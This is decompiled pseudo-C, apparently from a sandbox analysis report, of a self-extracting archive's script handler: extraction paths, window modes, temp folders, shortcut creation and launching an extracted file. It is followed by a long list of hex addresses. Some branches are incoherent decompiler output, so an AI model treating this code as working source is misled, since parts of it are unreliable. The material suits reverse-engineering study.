										__eflags = _t315 - 4;
										if(_t315 < 4) {
											L16:
											_t280 = E00CCBDB4(_t316 - 0x588c);
											__eflags = _t280;
											if(_t280 != 0) {
												break;
											}
											L17:
											_t283 = E00CE3E13(_t316 - 0x388c);
											__eflags = 0;
											 *((short*)(_t316 + _t283 * 2 - 0x388a)) = 0;
											E00CDFFF0(_t308, _t316 - 0x44, 0, 0x1e);
											_t318 = _t318 + 0x10;
											 *((intOrPtr*)(_t316 - 0x40)) = 3;
											_push(0x14);
											_pop(_t286);
											 *((short*)(_t316 - 0x34)) = _t286;
											 *((intOrPtr*)(_t316 - 0x3c)) = _t316 - 0x388c;
											_push(_t316 - 0x44);
											 *0xd2307c();
											goto L18;
										}
										_t291 = E00CE3E13(_t316 - 0x1044);
										__eflags = _t315 - _t291;
										if(_t315 > _t291) {
											goto L17;
										}
										goto L16;
									}
									 *(_t316 - 4) =  *(_t316 - 4) | 0xffffffff;
									E00CCA55A(_t316 - 0x8894);
								}
								goto L178;
							case 1:
								__eflags = __ebx;
								if(__ebx == 0) {
									__eax = E00CE3E13(__esi);
									__eax = __eax + __edi;
									_push(__eax);
									_push( *0xd1fc94);
									__eax = E00CE3E3E(__ecx, __edx);
									__esp = __esp + 0xc;
									__eflags = __eax;
									if(__eax != 0) {
										__eax = E00CE7686(__eax, __esi);
										_pop(__ecx);
										_pop(__ecx);
									}
									__eflags = __bh;
									if(__bh == 0) {
										__eax = L00CE3E2E(__esi);
									}
								}
								goto L178;
							case 2:
								__eflags = __ebx;
								if(__ebx == 0) {
									__ebp - 0x588c = SetWindowTextW( *(__ebp + 8), __ebp - 0x588c);
								}
								goto L178;
							case 3:
								__eflags = __ebx;
								if(__ebx != 0) {
									goto L178;
								}
								__eflags =  *0xd0a472 - __di;
								if( *0xd0a472 != __di) {
									goto L178;
								}
								__eax = 0;
								__edi = __ebp - 0x588c;
								_push(0x22);
								 *(__ebp - 0x1044) = __ax;
								_pop(__eax);
								__eflags =  *(__ebp - 0x588c) - __ax;
								if( *(__ebp - 0x588c) == __ax) {
									__edi = __ebp - 0x588a;
								}
								__eax = E00CE3E13(__edi);
								__esi = 0x800;
								__eflags = __eax - 0x800;
								if(__eax >= 0x800) {
									goto L178;
								} else {
									__eax =  *__edi & 0x0000ffff;
									_push(0x5c);
									_pop(__ecx);
									__eflags = ( *__edi & 0x0000ffff) - 0x2e;
									if(( *__edi & 0x0000ffff) != 0x2e) {
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L64:
											__ebp - 0x1044 = E00CD0602(__ebp - 0x1044, __edi, __esi);
											__ebx = 0;
											__eflags = 0;
											L65:
											_push(0x22);
											_pop(__eax);
											__eax = __ebp - 0x1044;
											__eax = E00CE279B(__ebp - 0x1044, __ebp - 0x1044);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__eflags =  *(__eax + 2) - __bx;
												if( *(__eax + 2) == __bx) {
													__ecx = 0;
													__eflags = 0;
													 *__eax = __cx;
												}
											}
											__eax = __ebp - 0x1044;
											__edi = 0xd0a472;
											E00CD0602(0xd0a472, __ebp - 0x1044, __esi) = __ebp - 0x1044;
											__eax = E00CDB1BE(__ebp - 0x1044, __esi);
											__esi = GetDlgItem( *(__ebp + 8), 0x66);
											__ebp - 0x1044 = SetWindowTextW(__esi, __ebp - 0x1044); // executed
											__eax = SendMessageW(__esi, 0x143, __ebx, 0xd0a472); // executed
											__eax = __ebp - 0x1044;
											__eax = E00CE3E49(__ebp - 0x1044, 0xd0a472, __eax);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__ebp - 0x1044 = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x1044);
											}
											goto L178;
										}
										L53:
										__eflags = __ax;
										if(__ax == 0) {
											L55:
											__eax = __ebp - 0x1c;
											__ebx = 0;
											_push(__ebp - 0x1c);
											_push(1);
											_push(0);
											_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
											_push(0x80000002);
											__eax =  *0xd23028();
											__eflags = __eax;
											if(__eax == 0) {
												__eax = __ebp - 0x14;
												 *(__ebp - 0x14) = 0x1000;
												_push(__ebp - 0x14);
												__eax = __ebp - 0x1044;
												_push(__ebp - 0x1044);
												__eax = __ebp - 0x24;
												_push(__ebp - 0x24);
												_push(0);
												_push(L"ProgramFilesDir");
												_push( *(__ebp - 0x1c));
												__eax =  *0xd23024();
												_push( *(__ebp - 0x1c));
												 *0xd23008() =  *(__ebp - 0x14);
												__ecx = 0x7ff;
												__eax =  *(__ebp - 0x14) >> 1;
												__eflags = __eax - 0x7ff;
												if(__eax >= 0x7ff) {
													__eax = 0x7ff;
												}
												__ecx = 0;
												__eflags = 0;
												 *(__ebp + __eax * 2 - 0x1044) = __cx;
											}
											__eflags =  *(__ebp - 0x1044) - __bx;
											if( *(__ebp - 0x1044) != __bx) {
												__eax = __ebp - 0x1044;
												__eax = E00CE3E13(__ebp - 0x1044);
												_push(0x5c);
												_pop(__ecx);
												__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x1046)) - __cx;
												if(__eflags != 0) {
													__ebp - 0x1044 = E00CD05DA(__eflags, __ebp - 0x1044, "\\", __esi);
												}
											}
											__esi = E00CE3E13(__edi);
											__eax = __ebp - 0x1044;
											__eflags = __esi - 0x7ff;
											__esi = 0x800;
											if(__eflags < 0) {
												__ebp - 0x1044 = E00CD05DA(__eflags, __ebp - 0x1044, __edi, 0x800);
											}
											goto L65;
										}
										__eflags =  *((short*)(__edi + 2)) - 0x3a;
										if( *((short*)(__edi + 2)) == 0x3a) {
											goto L64;
										}
										goto L55;
									}
									__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
									if( *((intOrPtr*)(__edi + 2)) != __cx) {
										goto L53;
									}
									__edi = __edi + 4;
									__ebx = 0;
									__eflags =  *__edi - __bx;
									if( *__edi == __bx) {
										goto L178;
									} else {
										__ebp - 0x1044 = E00CD0602(__ebp - 0x1044, __edi, 0x800);
										goto L65;
									}
								}
							case 4:
								__eflags =  *0xd0a46c - 1;
								__eflags = __eax - 0xd0a46c;
								 *__edi =  *__edi + __ecx;
								__eflags =  *(__edx + 7) & __al;
								 *__eax =  *__eax + __al;
								__eflags =  *__eax;
							case 5:
								__eax =  *(__ebp - 0x588c) & 0x0000ffff;
								__ecx = 0;
								__eax =  *(__ebp - 0x588c) & 0x0000ffff;
								__eflags = __eax;
								if(__eax == 0) {
									L82:
									 *0xd08457 = __cl;
									 *0xd08460 = 1;
									goto L178;
								}
								__eax = __eax - 0x30;
								__eflags = __eax;
								if(__eax == 0) {
									 *0xd08457 = __cl;
									L81:
									 *0xd08460 = __cl;
									goto L178;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax == 0) {
									goto L82;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax != 0) {
									goto L178;
								}
								 *0xd08457 = 1;
								goto L81;
							case 6:
								__edi = 0;
								 *0xd0c577 = 1;
								__edi = 1;
								__eax = __ebp - 0x588c;
								__eflags =  *(__ebp - 0x588c) - 0x3c;
								__ebx = __esi;
								 *(__ebp - 0x14) = __eax;
								if( *(__ebp - 0x588c) != 0x3c) {
									L99:
									__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 5;
									if( *((intOrPtr*)(__ebp + 0x10)) != 5) {
										__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 4;
										if( *((intOrPtr*)(__ebp + 0x10)) != 4) {
											goto L178;
										}
										__eflags = __ebx - 6;
										if(__ebx != 6) {
											goto L178;
										}
										__ecx = 0;
										__eflags = 0;
										_push(0);
										L105:
										_push(__edi);
										_push(__eax);
										_push( *(__ebp + 8));
										__eax = E00CDD78F(__ebp);
										goto L178;
									}
									__eflags = __ebx - 9;
									if(__ebx != 9) {
										goto L178;
									}
									_push(1);
									goto L105;
								}
								__eax = __ebp - 0x588a;
								_push(0x3e);
								_push(__ebp - 0x588a);
								__eax = E00CE22C6(__ecx);
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax == 0) {
									L98:
									__eax =  *(__ebp - 0x14);
									goto L99;
								}
								_t111 = __eax + 2; // 0x2
								__ecx = _t111;
								 *(__ebp - 0x14) = _t111;
								__ecx = 0;
								 *__eax = __cx;
								__eax = __ebp - 0x10c;
								_push(0x64);
								_push(__ebp - 0x10c);
								__eax = __ebp - 0x588a;
								_push(__ebp - 0x588a);
								__eax = E00CDAF98();
								 *(__ebp - 0x20) = __eax;
								__eflags = __eax;
								if(__eax == 0) {
									goto L98;
								}
								__esi = __eax;
								while(1) {
									__eflags =  *(__ebp - 0x10c);
									if( *(__ebp - 0x10c) == 0) {
										goto L98;
									}
									__eax = __ebp - 0x10c;
									__eax = E00CD1FBB(__ebp - 0x10c, L"HIDE");
									__eax =  ~__eax;
									asm("sbb eax, eax");
									__edi = __edi & __eax;
									__eax = __ebp - 0x10c;
									__eax = E00CD1FBB(__ebp - 0x10c, L"MAX");
									__eflags = __eax;
									if(__eax == 0) {
										_push(3);
										_pop(__edi);
									}
									__eax = __ebp - 0x10c;
									__eax = E00CD1FBB(__ebp - 0x10c, L"MIN");
									__eflags = __eax;
									if(__eax == 0) {
										_push(6);
										_pop(__edi);
									}
									_push(0x64);
									__eax = __ebp - 0x10c;
									_push(__ebp - 0x10c);
									_push(__esi);
									__esi = E00CDAF98();
									__eflags = __esi;
									if(__esi != 0) {
										continue;
									} else {
										goto L98;
									}
								}
								goto L98;
							case 7:
								__eflags = __ebx - 1;
								if(__eflags != 0) {
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										__eflags =  *0xd0a46c - __edi;
										if( *0xd0a46c == __edi) {
											 *0xd0a46c = 2;
										}
										 *0xd09468 = 1;
									}
									goto L178;
								}
								__eax = __ebp - 0x788c;
								__edi = 0x800;
								GetTempPathW(0x800, __ebp - 0x788c) = __ebp - 0x788c;
								__eax = E00CCB690(__eflags, __ebp - 0x788c, 0x800);
								__ebx = 0;
								__esi = 0;
								_push(0);
								while(1) {
									_push( *0xcfe724);
									__ebp - 0x788c = E00CC4092(0xd0946a, __edi, L"%s%s%u", __ebp - 0x788c);
									__eax = E00CCA231(0xd0946a);
									__eflags = __al;
									if(__al == 0) {
										break;
									}
									__esi =  &(__esi->i);
									__eflags = __esi;
									_push(__esi);
								}
								__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0xd0946a);
								__eflags =  *(__ebp - 0x588c) - __bx;
								if( *(__ebp - 0x588c) == __bx) {
									goto L178;
								}
								__eflags =  *0xd0c575 - __bl;
								if( *0xd0c575 != __bl) {
									goto L178;
								}
								__eax = 0;
								 *(__ebp - 0x444) = __ax;
								__eax = __ebp - 0x588c;
								_push(0x2c);
								_push(__ebp - 0x588c);
								__eax = E00CE22C6(__ecx);
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax != 0) {
									L122:
									__eflags =  *(__ebp - 0x444) - __bx;
									if( *(__ebp - 0x444) == __bx) {
										__ebp - 0x1b894 = __ebp - 0x588c;
										E00CD0602(__ebp - 0x588c, __ebp - 0x1b894, 0x1000) = __ebp - 0x19894;
										__ebp - 0x444 = E00CD0602(__ebp - 0x444, __ebp - 0x19894, 0x200);
									}
									__ebp - 0x588c = E00CDADD2(__ebp - 0x588c);
									__eax = 0;
									 *(__ebp - 0x488c) = __ax;
									__ebp - 0x444 = __ebp - 0x588c;
									__eax = E00CDA7E4( *(__ebp + 8), __ebp - 0x588c, __ebp - 0x444, 0x24);
									__eflags = __eax - 6;
									if(__eax != 6) {
										__eax = 0;
										 *0xd08454 = 1;
										 *0xd0946a = __ax;
										__eax = EndDialog( *(__ebp + 8), 1);
									}
									goto L178;
								}
								__ax =  *(__ebp - 0x588c);
								__esi = __ebx;
								__eflags = __ax;
								if(__ax == 0) {
									goto L122;
								}
								__ecx = __ax & 0x0000ffff;
								while(1) {
									__eflags = __cx - 0x40;
									if(__cx == 0x40) {
										break;
									}
									__eax =  *(__ebp + __esi * 2 - 0x588a) & 0x0000ffff;
									__esi =  &(__esi->i);
									__ecx = __eax;
									__eflags = __ax;
									if(__ax != 0) {
										continue;
									}
									goto L122;
								}
								__ebp - 0x588a = __ebp - 0x588a + __esi * 2;
								__ebp - 0x444 = E00CD0602(__ebp - 0x444, __ebp - 0x444, 0x200);
								__eax = 0;
								__eflags = 0;
								 *(__ebp + __esi * 2 - 0x588c) = __ax;
								goto L122;
							case 8:
								__eflags = __ebx - 3;
								if(__ebx == 3) {
									__eflags =  *(__ebp - 0x588c) - __di;
									if(__eflags != 0) {
										__eax = __ebp - 0x588c;
										_push(__ebp - 0x588c);
										__eax = E00CE7625(__ebx, __edi);
										_pop(__ecx);
										 *0xd1fc9c = __eax;
									}
									__eax = __ebp + 0xc;
									_push(__ebp + 0xc);
									 *0xd1fc98 = E00CDB48E(__ecx, __edx, __eflags);
								}
								 *0xd0c576 = 1;
								goto L178;
							case 9:
								__eflags = __ebx - 6;
								if(__ebx != 6) {
									goto L178;
								}
								__eax = 0;
								 *(__ebp - 0x2844) = __ax;
								__eax =  *(__ebp - 0x1b894) & 0x0000ffff;
								__eax = E00CE79E9( *(__ebp - 0x1b894) & 0x0000ffff);
								__eflags = __eax - 0x50;
								if(__eax == 0x50) {
									 *(__ebp - 0x14) = 2;
									__eax = 0xd1cb82;
								} else {
									__eflags = __eax - 0x54;
									if(__eax == 0x54) {
										 *(__ebp - 0x14) = 7;
										__eax = 0xd1bb82;
									} else {
										 *(__ebp - 0x14) = 0x10;
										__eax = 0xd1db82;
									}
								}
								__esi = 0x800;
								__ebp - 0x2844 = E00CD0602(__ebp - 0x2844, __ebp - 0x2844, 0x800);
								__eax = 0;
								 *(__ebp - 0x9894) = __ax;
								 *(__ebp - 0x1844) = __ax;
								__ebp - 0x19894 = __ebp - 0x688c;
								__eax = E00CD0602(__ebp - 0x688c, __ebp - 0x19894, 0x800);
								_push(0x22);
								_pop(__ebx);
								__eflags =  *(__ebp - 0x688c) - __bx;
								if( *(__ebp - 0x688c) != __bx) {
									__ebp - 0x688c = E00CCA231(__ebp - 0x688c);
									__eflags = __al;
									if(__al != 0) {
										goto L163;
									}
									__ax =  *(__ebp - 0x688c);
									__esi = __ebp - 0x688c;
									__ebx = __edi;
									__eflags = __ax;
									if(__ax == 0) {
										__esi = 0x800;
										goto L163;
									}
									__edi = __ax & 0x0000ffff;
									do {
										_push(0x20);
										_pop(__eax);
										__eflags = __di - __ax;
										if(__di == __ax) {
											L149:
											__eax = 0;
											__esi->i = __ax;
											__ebp - 0x688c = E00CCA231(__ebp - 0x688c);
											__eflags = __al;
											if(__al == 0) {
												L158:
												__esi->i = __di;
												goto L159;
											}
											__ebp - 0x688c = E00CCA243(__ebp - 0x688c);
											__eax = E00CCA28F(__eax);
											__eflags = __al;
											if(__al != 0) {
												goto L158;
											}
											_push(0x2f);
											_pop(__ecx);
											__eax =  &(__esi->i);
											__ebx = __esi;
											__eflags = __di - __cx;
											if(__di != __cx) {
												_push(0x20);
												__esi = __eax;
												_pop(__eax);
												while(1) {
													__eflags = __esi->i - __ax;
													if(__esi->i != __ax) {
														break;
													}
													__esi =  &(__esi->i);
													__eflags = __esi;
												}
												__ecx = __ebp - 0x1844;
												__eax = __esi;
												__edx = 0x400;
												L157:
												__eax = E00CD0602(__ecx, __eax, __edx);
												 *__ebx = __di;
												goto L159;
											}
											 *(__ebp - 0x1844) = __cx;
											__edx = 0x3ff;
											__ecx = __ebp - 0x1842;
											goto L157;
										}
										_push(0x2f);
										_pop(__eax);
										__eflags = __di - __ax;
										if(__di != __ax) {
											goto L159;
										}
										goto L149;
										L159:
										__esi =  &(__esi->i);
										__eax = __esi->i & 0x0000ffff;
										__edi = __esi->i & 0x0000ffff;
										__eflags = __ax;
									} while (__ax != 0);
									__esi = 0x800;
									__eflags = __ebx;
									if(__ebx != 0) {
										__eax = 0;
										 *__ebx = __ax;
									}
									goto L163;
								} else {
									__ebp - 0x19892 = __ebp - 0x688c;
									E00CD0602(__ebp - 0x688c, __ebp - 0x19892, 0x800) = __ebp - 0x688a;
									_push(__ebx);
									_push(__ebp - 0x688a);
									__eax = E00CE22C6(__ecx);
									_pop(__ecx);
									_pop(__ecx);
									__eflags = __eax;
									if(__eax != 0) {
										__ecx = 0;
										 *__eax = __cx;
										__ebp - 0x1844 = E00CD0602(__ebp - 0x1844, __ebp - 0x1844, 0x400);
									}
									L163:
									__eflags =  *((short*)(__ebp - 0x11894));
									if( *((short*)(__ebp - 0x11894)) != 0) {
										__ebp - 0x9894 = __ebp - 0x11894;
										__eax = E00CCB6C4(__ebp - 0x11894, __ebp - 0x9894, __esi);
									}
									__ebp - 0xb894 = __ebp - 0x688c;
									__eax = E00CCB6C4(__ebp - 0x688c, __ebp - 0xb894, __esi);
									__eflags =  *(__ebp - 0x2844);
									if(__eflags == 0) {
										__ebp - 0x2844 = E00CDB425(__ecx, __ebp - 0x2844,  *(__ebp - 0x14));
									}
									__ebp - 0x2844 = E00CCB690(__eflags, __ebp - 0x2844, __esi);
									__eflags =  *((short*)(__ebp - 0x17894));
									if(__eflags != 0) {
										__ebp - 0x17894 = __ebp - 0x2844;
										E00CD05DA(__eflags, __ebp - 0x2844, __ebp - 0x17894, __esi) = __ebp - 0x2844;
										__eax = E00CCB690(__eflags, __ebp - 0x2844, __esi);
									}
									__ebp - 0x2844 = __ebp - 0xc894;
									__eax = E00CD0602(__ebp - 0xc894, __ebp - 0x2844, __esi);
									__eflags =  *(__ebp - 0x13894);
									__eax = __ebp - 0x13894;
									if(__eflags == 0) {
										__eax = __ebp - 0x19894;
									}
									__ebp - 0x2844 = E00CD05DA(__eflags, __ebp - 0x2844, __ebp - 0x2844, __esi);
									__eax = __ebp - 0x2844;
									__eflags = E00CCB92D(__ebp - 0x2844);
									if(__eflags == 0) {
										L173:
										__ebp - 0x2844 = E00CD05DA(__eflags, __ebp - 0x2844, L".lnk", __esi);
										goto L174;
									} else {
										__eflags = __eax;
										if(__eflags == 0) {
											L174:
											__ebx = 0;
											__ebp - 0x2844 = E00CCA0B1(0, __ecx, __edi, __ebp, __ebp - 0x2844, 1, 0);
											__ebp - 0xb894 = __ebp - 0xa894;
											E00CD0602(__ebp - 0xa894, __ebp - 0xb894, __esi) = __ebp - 0xa894;
											__eax = E00CCC2E4(__eflags, __ebp - 0xa894);
											__esi =  *(__ebp - 0x1844) & 0x0000ffff;
											__eax = __ebp - 0x1844;
											__edx =  *(__ebp - 0x9894) & 0x0000ffff;
											__edi = __ebp - 0xa894;
											__ecx =  *(__ebp - 0x15894) & 0x0000ffff;
											__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff);
											asm("sbb esi, esi");
											__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff) & __ebp - 0x00001844;
											__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff);
											__eax = __ebp - 0x9894;
											asm("sbb edx, edx");
											__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894;
											__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff);
											__eax = __ebp - 0x15894;
											asm("sbb ecx, ecx");
											__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894;
											 *(__ebp - 0xa894) & 0x0000ffff =  ~( *(__ebp - 0xa894) & 0x0000ffff);
											asm("sbb eax, eax");
											 ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi = __ebp - 0x2844;
											__ebp - 0xb894 = E00CDA48A( ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894, 0, __ebp - 0xb894, __ebp - 0x2844,  ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi, __ecx,  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894, __esi);
											__eflags =  *(__ebp - 0xc894) - __bx;
											if( *(__ebp - 0xc894) != __bx) {
												_push(0);
												__eax = __ebp - 0xc894;
												_push(__ebp - 0xc894);
												_push(5);
												_push(0x1000);
												__eax =  *0xd2308c();
											}
											goto L178;
										}
										goto L173;
									}
								}
							case 0xa:
								__eflags = __ebx - 7;
								if(__ebx == 7) {
									 *0xd0a470 = 1;
								}
								goto L178;
							case 0xb:
								__eax =  *(__ebp - 0x588c) & 0x0000ffff;
								__eax = E00CE79E9( *(__ebp - 0x588c) & 0x0000ffff);
								__eflags = __eax - 0x46;
								if(__eax == 0x46) {
									 *0xd08461 = 1;
								} else {
									__eflags = __eax - 0x55;
									if(__eax == 0x55) {
										 *0xd08462 = 1;
									} else {
										__eax = 0;
										 *0xd08461 = __al;
										 *0xd08462 = __al;
									}
								}
								goto L178;
							case 0xc:
								 *0xd17b7a = 1;
								__eax = __eax + 0xd17b7a;
								_t125 = __esi + 0x39;
								 *_t125 =  *(__esi + 0x39) + __esp;
								__eflags =  *_t125;
								__ebp = 0xffffa774;
								if( *_t125 != 0) {
									_t127 = __ebp - 0x588c; // 0xffff4ee8
									__eax = _t127;
									 *0xcfe728 = E00CD1FA7(_t127);
								}
								goto L178;
						}
						L4:
						_push(0x1000);
						_push(_t311);
						_push(_t237);
						_t237 = E00CDAF98();
						_t311 = _t311 + 0x2000;
						_t308 = _t308 - 1;
						if(_t308 != 0) {
							goto L4;
						} else {
							_t312 = _t308;
							goto L6;
						}
						L178:
						_push(0x1000);
						_t221 = _t316 - 0x15; // 0xffffa75f
						_t222 = _t316 - 0xd; // 0xffffa767
						_t223 = _t316 - 0x588c; // 0xffff4ee8
						_t224 = _t316 - 0xf894; // 0xfffeaee0
						_push( *((intOrPtr*)(_t316 + 0xc)));
						_t232 = E00CDB314(_t308, _t316);
						_t293 =  *((intOrPtr*)(_t316 + 0x10));
						 *((intOrPtr*)(_t316 + 0xc)) = _t232;
					} while (_t232 != 0);
				}
			}











                                                    0x00cdc744
                                                    0x00cdc74e
                                                    0x00cdc757
                                                    0x00cdd40d
                                                    0x00cdd410
                                                    0x00cdd418
                                                    0x00cdd418
                                                    0x00cdc75d
                                                    0x00cdc765
                                                    0x00cdc769
                                                    0x00cdc770
                                                    0x00cdc777
                                                    0x00cdc778
                                                    0x00cdc77b
                                                    0x00cdc780
                                                    0x00cdc782
                                                    0x00cdc787
                                                    0x00cdc78e
                                                    0x00cdc792
                                                    0x00cdc793
                                                    0x00cdc795
                                                    0x00cdc79b
                                                    0x00cdc7a1
                                                    0x00cdc7a1
                                                    0x00000000
                                                    0x00cdc7bb
                                                    0x00cdc7d2
                                                    0x00cdc7d6
                                                    0x00000000
                                                    0x00cdc7d8
                                                    0x00000000
                                                    0x00cdc7d8
                                                    0x00cdc7d6
                                                    0x00cdc7e0
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc7e6
                                                    0x00000000
                                                    0x00cdc7ed
                                                    0x00cdc7f0
                                                    0x00cdc7f6
                                                    0x00cdc803
                                                    0x00cdc829
                                                    0x00cdc83d
                                                    0x00cdc840
                                                    0x00cdc84b
                                                    0x00cdc98f
                                                    0x00cdc98f
                                                    0x00cdc99d
                                                    0x00cdc9a2
                                                    0x00cdc9a4
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc85d
                                                    0x00cdc863
                                                    0x00cdc869
                                                    0x00cdc90f
                                                    0x00cdc916
                                                    0x00cdc91c
                                                    0x00cdc91f
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc928
                                                    0x00cdc92e
                                                    0x00cdc930
                                                    0x00000000
                                                    0x00cdc932
                                                    0x00cdc932
                                                    0x00cdc934
                                                    0x00cdc935
                                                    0x00cdc939
                                                    0x00cdc94d
                                                    0x00cdc952
                                                    0x00cdc95c
                                                    0x00cdc962
                                                    0x00cdc965
                                                    0x00cdc937
                                                    0x00cdc937
                                                    0x00cdc938
                                                    0x00000000
                                                    0x00cdc967
                                                    0x00cdc975
                                                    0x00cdc97b
                                                    0x00cdc97d
                                                    0x00cdc989
                                                    0x00cdc989
                                                    0x00000000
                                                    0x00cdc97d
                                                    0x00cdc965
                                                    0x00cdc930
                                                    0x00cdc87e
                                                    0x00cdc88b
                                                    0x00cdc89c
                                                    0x00cdc89f
                                                    0x00cdc8a2
                                                    0x00cdc8b5
                                                    0x00cdc8bc
                                                    0x00cdc8c1
                                                    0x00cdc8c3
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc8c9
                                                    0x00cdc8d0
                                                    0x00cdc8d5
                                                    0x00cdc8da
                                                    0x00cdc8e6
                                                    0x00cdc8eb
                                                    0x00cdc8ee
                                                    0x00cdc8f5
                                                    0x00cdc8f7
                                                    0x00cdc8f8
                                                    0x00cdc902
                                                    0x00cdc908
                                                    0x00cdc909
                                                    0x00000000
                                                    0x00cdc909
                                                    0x00cdc8ab
                                                    0x00cdc8b1
                                                    0x00cdc8b3
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc8b3
                                                    0x00cdc9aa
                                                    0x00cdc9b4
                                                    0x00cdc9b4
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc9be
                                                    0x00cdc9c0
                                                    0x00cdca13
                                                    0x00cdca18
                                                    0x00cdca21
                                                    0x00cdca22
                                                    0x00cdca28
                                                    0x00cdca2d
                                                    0x00cdca30
                                                    0x00cdca32
                                                    0x00cdca44
                                                    0x00cdca49
                                                    0x00cdca4a
                                                    0x00cdca4a
                                                    0x00cdca4b
                                                    0x00cdca4d
                                                    0x00cdca54
                                                    0x00cdca59
                                                    0x00cdca4d
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdca5f
                                                    0x00cdca61
                                                    0x00cdca71
                                                    0x00cdca71
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdca7c
                                                    0x00cdca7e
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdca84
                                                    0x00cdca8b
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdca91
                                                    0x00cdca93
                                                    0x00cdca99
                                                    0x00cdca9b
                                                    0x00cdcaa2
                                                    0x00cdcaa3
                                                    0x00cdcaaa
                                                    0x00cdcaac
                                                    0x00cdcaac
                                                    0x00cdcab3
                                                    0x00cdcab8
                                                    0x00cdcabe
                                                    0x00cdcac0
                                                    0x00000000
                                                    0x00cdcac6
                                                    0x00cdcac6
                                                    0x00cdcac9
                                                    0x00cdcacb
                                                    0x00cdcacc
                                                    0x00cdcacf
                                                    0x00cdcaf8
                                                    0x00cdcafb
                                                    0x00cdcbe0
                                                    0x00cdcbe9
                                                    0x00cdcbee
                                                    0x00cdcbee
                                                    0x00cdcbf0
                                                    0x00cdcbf0
                                                    0x00cdcbf2
                                                    0x00cdcbf4
                                                    0x00cdcbfb
                                                    0x00cdcc00
                                                    0x00cdcc01
                                                    0x00cdcc02
                                                    0x00cdcc04
                                                    0x00cdcc06
                                                    0x00cdcc0a
                                                    0x00cdcc0c
                                                    0x00cdcc0c
                                                    0x00cdcc0e
                                                    0x00cdcc0e
                                                    0x00cdcc0a
                                                    0x00cdcc12
                                                    0x00cdcc18
                                                    0x00cdcc25
                                                    0x00cdcc2c
                                                    0x00cdcc3c
                                                    0x00cdcc46
                                                    0x00cdcc54
                                                    0x00cdcc5a
                                                    0x00cdcc62
                                                    0x00cdcc67
                                                    0x00cdcc68
                                                    0x00cdcc69
                                                    0x00cdcc6b
                                                    0x00cdcc7f
                                                    0x00cdcc7f
                                                    0x00000000
                                                    0x00cdcc6b
                                                    0x00cdcb01
                                                    0x00cdcb01
                                                    0x00cdcb04
                                                    0x00cdcb11
                                                    0x00cdcb11
                                                    0x00cdcb14
                                                    0x00cdcb16
                                                    0x00cdcb17
                                                    0x00cdcb19
                                                    0x00cdcb1a
                                                    0x00cdcb1f
                                                    0x00cdcb24
                                                    0x00cdcb2a
                                                    0x00cdcb2c
                                                    0x00cdcb2e
                                                    0x00cdcb31
                                                    0x00cdcb38
                                                    0x00cdcb39
                                                    0x00cdcb3f
                                                    0x00cdcb40
                                                    0x00cdcb43
                                                    0x00cdcb44
                                                    0x00cdcb45
                                                    0x00cdcb4a
                                                    0x00cdcb4d
                                                    0x00cdcb53
                                                    0x00cdcb5c
                                                    0x00cdcb5f
                                                    0x00cdcb64
                                                    0x00cdcb66
                                                    0x00cdcb68
                                                    0x00cdcb6a
                                                    0x00cdcb6a
                                                    0x00cdcb6c
                                                    0x00cdcb6c
                                                    0x00cdcb6e
                                                    0x00cdcb6e
                                                    0x00cdcb76
                                                    0x00cdcb7d
                                                    0x00cdcb7f
                                                    0x00cdcb86
                                                    0x00cdcb8c
                                                    0x00cdcb8e
                                                    0x00cdcb8f
                                                    0x00cdcb97
                                                    0x00cdcba6
                                                    0x00cdcba6
                                                    0x00cdcb97
                                                    0x00cdcbb1
                                                    0x00cdcbb3
                                                    0x00cdcbc2
                                                    0x00cdcbc8
                                                    0x00cdcbce
                                                    0x00cdcbd9
                                                    0x00cdcbd9
                                                    0x00000000
                                                    0x00cdcbce
                                                    0x00cdcb06
                                                    0x00cdcb0b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcb0b
                                                    0x00cdcad1
                                                    0x00cdcad5
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcad7
                                                    0x00cdcada
                                                    0x00cdcadc
                                                    0x00cdcadf
                                                    0x00000000
                                                    0x00cdcae5
                                                    0x00cdcaee
                                                    0x00000000
                                                    0x00cdcaee
                                                    0x00cdcadf
                                                    0x00000000
                                                    0x00cdcc8a
                                                    0x00cdcc8b
                                                    0x00cdcc90
                                                    0x00cdcc92
                                                    0x00cdcc95
                                                    0x00cdcc95
                                                    0x00000000
                                                    0x00cdcccb
                                                    0x00cdccd2
                                                    0x00cdccd4
                                                    0x00cdccd4
                                                    0x00cdccd6
                                                    0x00cdcd05
                                                    0x00cdcd05
                                                    0x00cdcd0b
